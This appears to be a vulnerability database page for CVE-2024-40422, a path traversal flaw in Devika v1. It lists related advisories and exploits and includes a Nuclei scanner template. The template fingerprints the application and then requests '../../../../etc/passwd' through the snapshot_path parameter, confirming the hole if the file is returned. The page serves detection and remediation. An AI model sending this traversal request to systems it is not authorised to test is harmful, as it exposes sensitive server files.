| Title | Published | Views | Family |
|---|---|---|---|
| Devika v1 - Path Traversal via (snapshot_path) Exploit | 4 Aug 2024 00:00 | – | zdt |
| CVE-2024-40422 | 24 Jul 2024 19:09 | – | circl |
| Devika Path Traversal Vulnerability | 24 Jul 2024 00:00 | – | cnnvd |
| CVE-2024-40422 | 24 Jul 2024 00:00 | – | cve |
| CVE-2024-40422 | 24 Jul 2024 00:00 | – | cvelist |
| Devika v1 - Path Traversal via 'snapshot_path' | 4 Aug 2024 00:00 | – | exploitdb |
| Exploit for Cross-site Scripting in Flatpress | 28 Jan 2025 21:16 | – | githubexploit |
| Exploit for Path Traversal in Stitionai Devika | 6 Aug 2024 07:09 | – | githubexploit |
| CVE-2024-40422 | 24 Jul 2024 16:15 | – | nvd |
| Generic HTTP Directory Traversal / File Inclusion (Web Application URL Parameter) - Active Check | 26 Sep 2017 00:00 | – | openvas |

```yaml
id: CVE-2024-40422

info:
  name: Devika v1 - Path Traversal
  author: s4e-io,alpernae
  severity: critical
  description: |
    The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
  impact: |
    Unauthenticated attackers can exploit path traversal to access sensitive files on the server.
  remediation: |
    Update Devika to a version later than v1 that patches the path traversal vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-40422
    - https://cvefeed.io/vuln/detail/CVE-2024-40422
    - https://github.com/alpernae/CVE-2024-40422
    - https://github.com/stitionai/devika
    - https://www.exploit-db.com/exploits/52066
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-40422
    cwe-id: CWE-22
    epss-score: 0.11414
    epss-percentile: 0.95466
    cpe: cpe:2.3:a:stitionai:devika:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: stitionai
    product: devika
    fofa-query: icon_hash="-1429839495"
  tags: cve,cve2024,devika,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /api/data HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"models","projects","OPENAI","OLLAMA")'
          - 'contains(content_type,"application/json")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022062098ad3af4e4166812cce9a655359beac6ab0ddf58c6341b9f31202f37e86f3022100df93697976f40f39be73dc449402e1989bf34808f2347208611edeaf730d1d7b:922c64590222798bb761d5b6d8e72950
```